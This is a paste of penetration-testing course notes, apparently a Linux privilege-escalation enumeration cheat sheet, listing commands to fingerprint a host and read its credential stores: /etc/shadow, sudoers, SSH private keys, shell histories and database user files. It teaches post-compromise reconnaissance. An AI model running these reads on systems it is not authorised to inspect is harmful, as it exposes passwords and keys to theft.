Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST.


#########################################################################
# What kind of Linux am I on and how can I find out? 			        #
# Great reference: 							                            #
# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 	#
#########################################################################
- What’s the distribution type? What version?
-------------------------------------------
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release      		# Debian based
cat /etc/redhat-release   		# Redhat based



- What’s the kernel version? Is it 64-bit?
-------------------------------------------
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-



- What can be learnt from the environmental variables?
----------------------------------------------------
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set


- What services are running? Which service has which user privilege?
------------------------------------------------------------------
ps aux
ps -ef
top
cat /etc/services


- Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check!
---------------------------------------------------------------------------------------------------------------
ps aux | grep root
ps -ef | grep root



- What applications are installed? What version are they? Are they currently running?
------------------------------------------------------------------------------------
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/


- Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
------------------------------------------------------------------------------------
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'



- What jobs are scheduled?
------------------------
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root


- Any plain text usernames and/or passwords?
------------------------------------------
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   		# Search for Joomla passwords


- What NIC(s) does the system have? Is it connected to another network?
---------------------------------------------------------------------
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


- What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
------------------------------------------------------------------------------------------------------------------------
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

- What other users & hosts are communicating with the system?
-----------------------------------------------------------
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w



- Whats cached? IP and/or MAC addresses
-------------------------------------
arp -e
route
/sbin/route -nee


- Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
------------------------------------------------------------------------------------------
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l



- What sensitive files can be found?
----------------------------------
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/



- Anything “interesting” in the home directorie(s)? If it’s possible to access
----------------------------------------------------------------------------
ls -ahlR /root/
ls -ahlR /home/


- Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
---------------------------------------------------------------------------------------------------------------------------
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


- What has the user being doing? Is there any password in plain text? What have they been edting?
-----------------------------------------------------------------------------------------------
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history



- What user information can be found?
-----------------------------------
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


- Can private-key information be found?
-------------------------------------
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


- Any settings/files (hidden) on website? Any settings file with database information?
------------------------------------------------------------------------------------
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


- Is there anything in the log file(s) (Could help with “Local File Includes”!)
-----------------------------------------------------------------------------
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

- Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp





########################################################################################################################################





################################################
# Day 2: Preparing for the Comptia Linux+ Exam #
################################################

Public Pastes

⭐ get any gift card for AF
JavaScript | 4 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 5 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 12 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 13 min ago | 0.17 KB
⭐ FREE giftcards method ON
JavaScript | 21 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 22 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 29 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 30 min ago | 0.17 KB